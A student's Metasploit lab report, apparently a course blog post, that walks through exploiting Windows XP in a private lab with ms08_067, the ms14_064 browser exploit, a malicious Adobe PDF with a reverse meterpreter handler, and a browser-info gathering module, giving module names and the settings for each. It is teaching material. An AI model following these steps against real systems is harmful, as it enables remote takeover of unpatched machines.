Exp5 MSF基础应用

20154331 Exp5 MSF基础应用

实验内容:

1、主动攻击:ms08_067。

首先我们用 search ms08-067查看漏洞信息。

我们发现就只有一个工具,于是乎调用它,使用 use exploit/windows/smb/ms08_067_netapi.

然后键入show payloads看一下我们需要的payload

然后我们输入set payload generic/shell_reverse_tcp选择病毒模块。然后show option 查看相应的信息。

然后我们设置相应的参数,LHOST是主机,RHOST是靶机。

主机ip为192.168.116.131

靶机ip为192.168.116.134

回连成功了!

然后我尝试是在主机下与自己ping,结果能ping通,主动攻击成功!!!

2、针对浏览器的攻击,ms14-064.

   首先在微软的官网上上到14-064以及了解相关信息。决定用这个。

  

 

在msf中search ms14-064, 看到三个工具。

然后我们选择用第一个模块:use exploit/windows/browser/ms14_064_ole_code_execution.

并反向链接:payload windows/meterpreter/reverse_tcp。

然后输入:show options配置一下参数。

由于这个实验是第二天做的,主机的ip地址又变成了192.168.116.135.我们来配置一下参数:

AllowPowershellprompt改为true:set AllowPowershellPrompt true

LHOST---攻击机的IP地址:set LHOST 192.168.116.135

SRVHOST---攻击机的IP地址:set SRVHOST 192.168.116.135

exploit.

exploit攻击后会生成带有攻击性的URL,这里生成的URL为:http://192.168.0.203:8080/fuiYPGD3cKdbp,

URL发到winxp上用winxp的ie浏览器打开:

回到msf,我们可以看到有攻击绘画的建立,得到一个session 2,(1是我之前一次建立的,不用管他)利用这个绘画便得到了meterpreter,输入指令获取winxp的信息

攻击成功!!!!

攻击成功!!!

3、针对客户端的攻击:adobe

 首先和之前一样用search命令查找对该漏洞的攻击模块:search adobe

我选取的是下面蓝框的:use exploit/windows/fileformat/adobe_pdf_embedded_exe.

然后查看需要的设置和可以攻击的靶机类型:

输入:show options

 然后exploit生成:

输入:use exploit/multi/handler 进入handler模式,然后exploit

我们输入抓屏指令:screenshot试试

成功了!!!!

 

4、成功应用任何一个辅助模块。

 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是 gather/browser_info

 

 然后输入 :show options查看需要修改的信息:

 

修改主机IP地址:set SRVHOST 192.168.116.135

生成一个usl,我们把这个网址复制到winxp靶机上用浏览器打开:

 

 

 上钩了:

 

基础问题回答:

(1)用自己的话解释什么是exploit,payload,encode.

exploit是生成或启动已经设置好的攻击程序,获得相应权限。在实验中,exploit生成了PDF文件来将被攻击主机的shell传送给在监听的Kali;生成了一个网站服务器,被攻击者连接时可被攻击;直接攻击win7主机等。
     payload是指将恶意代码包装成可插入到目标主机的东西。
     encode是指编码,去掉一些无用的字符或改变自己的特征码。

实验体会:

这是第五次实验MSF基础应用,这次争对具体主机进行攻击,原来漏洞那么多,看来还是要及时修补漏洞才是真的,什么网络链接之类的都不敢再点了,哈哈哈,不过还是收获很多的。

 

 

 

posted @ 2018-04-19 10:59  20154331黄芮  阅读(183)  评论(0编辑  收藏